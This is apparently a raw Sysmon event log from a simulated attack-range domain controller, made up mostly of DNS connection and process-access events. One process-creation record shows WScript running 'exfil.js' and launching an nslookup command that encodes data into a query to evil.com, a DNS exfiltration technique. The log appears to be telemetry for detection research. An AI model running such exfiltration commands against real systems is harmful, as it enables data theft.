14:21:50.556{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51335- 354300x8000000000000000215988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.556{00000000-0000-0000-0000-000000000000}7944<unknown process>-udptruefalse127.0.0.1-51335-false127.0.0.1-53domain 354300x8000000000000000215987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.556{00000000-0000-0000-0000-000000000000}7944<unknown process>-udpfalsefalse127.0.0.1-51334-false127.0.0.1-53domain 10341000x8000000000000000215986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.337{2E1864BB-1900-629A-7F46-000000005F02}60126220C:\Windows\system32\conhost.exe{2E1864BB-1900-629A-7E46-000000005F02}1676C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000215985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.556{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51334- 354300x8000000000000000215984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.556{00000000-0000-0000-0000-000000000000}7944<unknown process>-udptruefalse127.0.0.1-51334-false127.0.0.1-53domain 354300x8000000000000000215983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.459{00000000-0000-0000-0000-000000000000}7280<unknown process>-udpfalsefalse127.0.0.1-51333-false127.0.0.1-53domain 354300x8000000000000000215982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.459{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51333- 354300x8000000000000000215981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.459{00000000-0000-0000-0000-000000000000}7280<unknown process>-udptruefalse127.0.0.1-51333-false127.0.0.1-53domain 354300x8000000000000000215980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.366{00000000-0000-0000-0000-000000000000}6208<unknown process>-udpfalsefalse127.0.0.1-51332-false127.0.0.1-53domain 354300x8000000000000000215979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.366{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51332- 354300x8000000000000000215978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.366{00000000-0000-0000-0000-000000000000}6208<unknown process>-udptruefalse127.0.0.1-51332-false127.0.0.1-53domain 354300x8000000000000000215977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.366{00000000-0000-0000-0000-000000000000}6208<unknown process>-udpfalsefalse127.0.0.1-51331-false127.0.0.1-53domain 354300x8000000000000000215976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.366{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51331- 354300x8000000000000000215975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.366{00000000-0000-0000-0000-000000000000}6208<unknown process>-udptruefalse127.0.0.1-51331-false127.0.0.1-53domain 354300x8000000000000000215974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.366{00000000-0000-0000-0000-000000000000}6208<unknown process>-udpfalsefalse127.0.0.1-51330-false127.0.0.1-53domain 354300x8000000000000000215973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.366{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51330- 354300x8000000000000000215972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.366{00000000-0000-0000-0000-000000000000}6208<unknown process>-udptruefalse127.0.0.1-51330-false127.0.0.1-53domain 354300x8000000000000000215971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.274{00000000-0000-0000-0000-000000000000}1848<unknown process>-udpfalsefalse127.0.0.1-51329-false127.0.0.1-53domain 10341000x8000000000000000215970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.322{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-7F46-000000005F02}6012C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000215969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.274{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51329- 354300x8000000000000000215968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.274{00000000-0000-0000-0000-000000000000}1848<unknown process>-udptruefalse127.0.0.1-51329-false127.0.0.1-53domain 354300x8000000000000000215967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.274{00000000-0000-0000-0000-000000000000}1848<unknown process>-udpfalsefalse127.0.0.1-51328-false127.0.0.1-53domain 354300x8000000000000000215966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.274{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51328- 354300x8000000000000000215965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.274{00000000-0000-0000-0000-000000000000}1848<unknown process>-udptruefalse127.0.0.1-51328-false127.0.0.1-53domain 354300x8000000000000000215964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.273{00000000-0000-0000-0000-000000000000}1848<unknown process>-udpfalsefalse127.0.0.1-51327-false127.0.0.1-53domain 354300x8000000000000000215963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.273{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51327- 354300x8000000000000000215962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.190{00000000-0000-0000-0000-000000000000}7780<unknown process>-udpfalsefalse127.0.0.1-51326-false127.0.0.1-53domain 10341000x8000000000000000215961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.306{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-7E46-000000005F02}1676C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.306{2E1864BB-18E0-629A-6742-000000005F02}39763596C:\Windows\System32\WScript.exe{2E1864BB-1900-629A-7E46-000000005F02}1676C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000215959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.190{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51326- 10341000x8000000000000000215958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.306{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.306{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.306{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.306{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.309{2E1864BB-1900-629A-7E46-000000005F02}1676C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldushg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000215953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.190{00000000-0000-0000-0000-000000000000}7780<unknown process>-udptruefalse127.0.0.1-51326-false127.0.0.1-53domain 354300x8000000000000000215952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.190{00000000-0000-0000-0000-000000000000}7780<unknown process>-udpfalsefalse127.0.0.1-51325-false127.0.0.1-53domain 354300x8000000000000000215951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.190{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51325- 354300x8000000000000000215950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.190{00000000-0000-0000-0000-000000000000}7780<unknown process>-udptruefalse127.0.0.1-51325-false127.0.0.1-53domain 354300x8000000000000000215949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.189{00000000-0000-0000-0000-000000000000}7780<unknown process>-udpfalsefalse127.0.0.1-51324-false127.0.0.1-53domain 354300x8000000000000000215948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.189{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51324- 354300x8000000000000000215947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.189{00000000-0000-0000-0000-000000000000}7780<unknown process>-udptruefalse127.0.0.1-51324-false127.0.0.1-53domain 354300x8000000000000000215946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.092{00000000-0000-0000-0000-000000000000}7904<unknown process>-udpfalsefalse127.0.0.1-51323-false127.0.0.1-53domain 354300x8000000000000000215945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.092{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51323- 354300x8000000000000000215944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.091{00000000-0000-0000-0000-000000000000}7904<unknown process>-udptruefalse127.0.0.1-51323-false127.0.0.1-53domain 354300x8000000000000000215943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.091{00000000-0000-0000-0000-000000000000}7904<unknown process>-udpfalsefalse127.0.0.1-51322-false127.0.0.1-53domain 354300x8000000000000000215942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.091{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51322- 354300x8000000000000000215941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.091{00000000-0000-0000-0000-000000000000}7904<unknown process>-udpfalsefalse127.0.0.1-51321-false127.0.0.1-53domain 354300x8000000000000000215940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.091{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51321- 354300x8000000000000000215939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.091{00000000-0000-0000-0000-000000000000}7904<unknown process>-udptruefalse127.0.0.1-51321-false127.0.0.1-53domain 354300x8000000000000000215938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.958{00000000-0000-0000-0000-000000000000}3972<unknown process>-udpfalsefalse127.0.0.1-51320-false127.0.0.1-53domain 354300x8000000000000000215937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.958{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51320- 23542300x8000000000000000215936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.284{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzolybhl.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.958{00000000-0000-0000-0000-000000000000}3972<unknown process>-udptruefalse127.0.0.1-51320-false127.0.0.1-53domain 354300x8000000000000000215934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.958{00000000-0000-0000-0000-000000000000}3972<unknown process>-udpfalsefalse127.0.0.1-51319-false127.0.0.1-53domain 354300x8000000000000000215933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.957{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51319- 354300x8000000000000000215932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.957{00000000-0000-0000-0000-000000000000}3972<unknown process>-udptruefalse127.0.0.1-51319-false127.0.0.1-53domain 354300x8000000000000000215931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.957{00000000-0000-0000-0000-000000000000}3972<unknown process>-udpfalsefalse127.0.0.1-51318-false127.0.0.1-53domain 354300x8000000000000000215930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.956{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51318- 354300x8000000000000000215929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.956{00000000-0000-0000-0000-000000000000}3972<unknown process>-udptruefalse127.0.0.1-51318-false127.0.0.1-53domain 354300x8000000000000000215928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.861{00000000-0000-0000-0000-000000000000}660<unknown process>-udpfalsefalse127.0.0.1-51317-false127.0.0.1-53domain 354300x8000000000000000215927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.861{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51317- 354300x8000000000000000215926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.861{00000000-0000-0000-0000-000000000000}660<unknown process>-udptruefalse127.0.0.1-51317-false127.0.0.1-53domain 354300x8000000000000000215925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.772{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51316- 10341000x8000000000000000215924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.253{2E1864BB-1900-629A-7C46-000000005F02}42282652C:\Windows\system32\conhost.exe{2E1864BB-1900-629A-7D46-000000005F02}1736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.253{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.237{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.237{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 